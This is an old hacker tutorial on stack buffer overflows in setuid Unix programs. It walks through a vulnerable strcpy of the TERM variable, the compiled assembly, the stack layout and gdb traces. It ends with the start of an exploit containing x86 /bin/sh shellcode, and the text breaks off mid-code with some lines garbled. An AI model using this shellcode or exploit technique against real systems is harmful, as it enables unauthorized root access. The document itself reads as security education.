An Introduction to executing arbituary code via stack overflows --------------------------------------------------------------- Before we delve into the technical details here's a little background. Suid/sgid binaries ------------------ one of the problems with multiuser operating systems is that you will eventually need to allow users to perform functions which require root privledges -- be it changing a password, gecos field information, or accessing restricted devices. Rather than give the user complete control over the system by giving them root privledges you can make a program that will do what the user wants as root and thus they cannot do anything that my comprimise system security. You do this with a suid/sgid binary: -rwsr-xr-x 1 root root 44705 Jul 1 00:49 /usr/bin/passwd when the user (whoever he/she may be) executes /usr/bin/passwd the user's uid/gid is changed to root and the binary is executed. After completing execution the user's uid/gid is changed back to what it was. Unfortunately people who write suid/sgid bins have to be very careful to not execute anything that the user may comprimise security with. One of the things that suid/sgid writers have to be careful of is copying data into buffers without a limit on the number of characters that may be copied. This is where we come in. By copying more data than the buffer can contain we can overwrite important parts of the stack and execute arbituary code. Overflow sploits ---------------- ok.. what is an overflow sploit? well.. lets have a look at some code: void main(int argc, char **argv, char **envp) { char s[1024]; strcpy(s,getenv("TERM")); } this is a really common peice of code.. and many a sploit is based around just this kind of oversight. So exactly what is wrong with this and how can we exploit it? ok.. lets have a look, suppose this file is called "simple". $ export TERM="01234567890123456789012345678901234567890123456789012345678 90123456789012345678901234567890123456789012345678901234567890123456789012 34567890123456789012345678901234567890123456789012345678901234567890123456 78901234567890123456789012345678901234567890123456789012345678901234567890 12345678901234567890123456789012345678901234567890123456789012345678901234 56789012345678901234567890123456789012345678901234567890123456789012345678 90123456789012345678901234567890123456789012345678901234567890123456789012 34567890123456789012345678901234567890123456789012345678901234567890123456 78901234567890123456789012345678901234567890123456789012345678901234567890 12345678901234567890123456789012345678901234567890123456789012345678901234 56789012345678901234567890123456789012345678901234567890123456789012345678 90123456789012345678901234567890123456789012345678901234567890123456789012 34567890123456789012345678901234567890123456789012345678901234567890123456 78901234567890123456789012345678901234567890123456789012345678901234567890 123456789" $ ./simple Segmentation fault In case you missed that first bit.. we're setting the variable TERM to over 1024 characters. We then execute simple and it gives us a segmentation fault. Why? Well, to understand that we need to know exactly what is happening. Do the following: $ cat simple.c #include #include void main(int argc,char **argv,char **envp) { char s[1024]; strcpy(s,getenv("TERM")); } $ gcc simple.c -S $ cat simple.s .file "simple.c" .version "01.01" gcc2_compiled.: .section .rodata .LC0: .string "TERM" .text .align 16 .globl main .type main,@function main: pushl %ebp movl %esp,%ebp subl $1024,%esp pushl $.LC0 call getenv addl $4,%esp movl %eax,%eax pushl %eax leal -1024(%ebp),%eax pushl %eax call strcpy addl $8,%esp .L1: movl %ebp,%esp popl %ebp ret .Lfe1: .size main,.Lfe1-main .ident "GCC: (GNU) 2.7.0" $ ok.. so that's a bit and now we need to know something. We need to know a little x86 asm.. That's a little beyond the scope of this article so you might want to check out a book or two.. Anyways.. here's the important bits of that output: pushl %ebp movl %esp,%ebp subl $1024,%esp .. ret The first two lines are called "setting up a stack frame" and is a standard part of code compiled by a c compiler. The third line here is allocating space on the stack for the "s" variable in our c code back up there. From this we can get an idea about what the stack looks like: +-------------+ -1024(%ebp) | 1024 bytes | (s variable) +-------------+ 0(%ebp) | ebp | +-------------+ 4(%ebp) | ret addr | +-------------+ 8(%ebp) | argc | +-------------+ 12(%ebp) | argv | +-------------+ 16(%ebp) | envp | +-------------+ ok.. so what happens when we do a strlen of the environment variable TERM that is bigger than 1024 bytes? We start copying to -1024(%ebp) and go to -1023(%ebp) and so on and we SHOULD stop before 0(%ebp) but we dont, we keep going and copy over the value of ebp stored on the stack and the return address. So what happens when we get to that ret down the bottom? Well the value of the return address has been overwritten and destroyed so it ends up jumping into the middle of nowhere, that is, unless we make it jump to somewhere useful. GDB - your new friend --------------------- GDB or the GNU symbolic debugger. Using this useful util we can actually look at what happens. Our previous example: $ export TERM="01234567890123456789012345678901234567890123456789012345678 90123456789012345678901234567890123456789012345678901234567890123456789012 34567890123456789012345678901234567890123456789012345678901234567890123456 78901234567890123456789012345678901234567890123456789012345678901234567890 12345678901234567890123456789012345678901234567890123456789012345678901234 56789012345678901234567890123456789012345678901234567890123456789012345678 90123456789012345678901234567890123456789012345678901234567890123456789012 34567890123456789012345678901234567890123456789012345678901234567890123456 78901234567890123456789012345678901234567890123456789012345678901234567890 12345678901234567890123456789012345678901234567890123456789012345678901234 56789012345678901234567890123456789012345678901234567890123456789012345678 90123456789012345678901234567890123456789012345678901234567890123456789012 34567890123456789012345678901234567890123456789012345678901234567890123456 78901234567890123456789012345678901234567890123456789012345678901234567890 123456789" $ gdb simple GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.14 (i486-slackware-linux), Copyright 1995 Free Software Foundation, Inc...(no debugging symbols found)... (gdb) break main Breakpoint 1 at 0x80004e9 (gdb) run Starting program: simple Breakpoint 1, 0x80004e9 in main () (gdb) disass Dump of assembler code for function main: 0x80004e0
: pushl %ebp 0x80004e1 : movl %esp,%ebp 0x80004e3 : subl $0x400,%esp 0x80004e9 : pushl $0x8000548 0x80004ee : call 0x80003d8 0x80004f3 : addl $0x4,%esp 0x80004f6 : movl %eax,%eax 0x80004f8 : pushl %eax 0x80004f9 : leal 0xfffffc00(%ebp),%eax 0x80004ff : pushl %eax 0x8000500 : call 0x80003c8 0x8000505 : addl $0x8,%esp 0x8000508 : movl %ebp,%esp 0x800050a : popl %ebp 0x800050b : ret 0x800050c : nop 0x800050d : nop 0x800050e : nop 0x800050f : nop End of assembler dump. (gdb) break *0x800050b Breakpoint 2 at 0x800050b (gdb) cont Continuing. Breakpoint 2, 0x800050b in main () (gdb) stepi 0x37363534 in __fpu_control () (gdb) stepi Program received signal SIGSEGV, Segmentation fault. 0x37363534 in __fpu_control () (gdb) ok.. so we get a segmentation fault.. why? well cause there's no code at address 0x37363534. lets have a look at the stack: $ gdb simple GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.14 (i486-slackware-linux), Copyright 1995 Free Software Foundation, Inc...(no debugging symbols found)... (gdb) break main Breakpoint 1 at 0x80004e9 (gdb) run Starting program: simple Breakpoint 1, 0x80004e9 in main () (gdb) info registers eax 0x0 0 ecx 0xc 12 edx 0x0 0 ebx 0x0 0 esp 0xbffff800 0xbffff800 ebp 0xbffffc04 0xbffffc04 esi 0x50000000 1342177280 edi 0x50001df0 1342184944 eip 0x80004ee 0x80004ee ps 0x382 898 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x2b 43 gs 0x2b 43 (gdb) x/5xw 0xbffffc04 0xbffffc04 <__fpu_control+3087001064>: 0xbffff8e8 0x08000495 0x00000001 0xbffffc18 0xbffffc14 <__fpu_control+3087001080>: 0xbffffc20 (gdb) the first value here (0xbffff8e8) is the value of ebp before it was pushed onto the stack. The next value is the return address. The 0x00000001 is argc and 0xbffffc18 is argv and the 0xbffffc20 is envp. So if we were to copy 1024 + 8 bytes we could overwrite the return address and make it jump back to our code (that we also copy there). So lets skip to the chase. If we set TERM to: when we get to the ret it'll return to the nops and continue down to the code which executes a shell. The only problem we have now is what the return address should be. The perfect return address would be 0xbffff804 but it's rather unlikely that we would have that information when we write the sploit so we try to estimate it. Here is the sploit for our "simple" example: long get_esp(void) { __asm__("movl %esp,%eax\n"); } char *realegg = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; /*char *realegg="\xeb\xfe\0";*/ char s[1034]; int i; char *s1; #define STACKFRAME (0xc00 - 0x818) void main(int argc,char **argv,char **envp) { strcpy(s,"TERM="); s1 = s+5; while (s1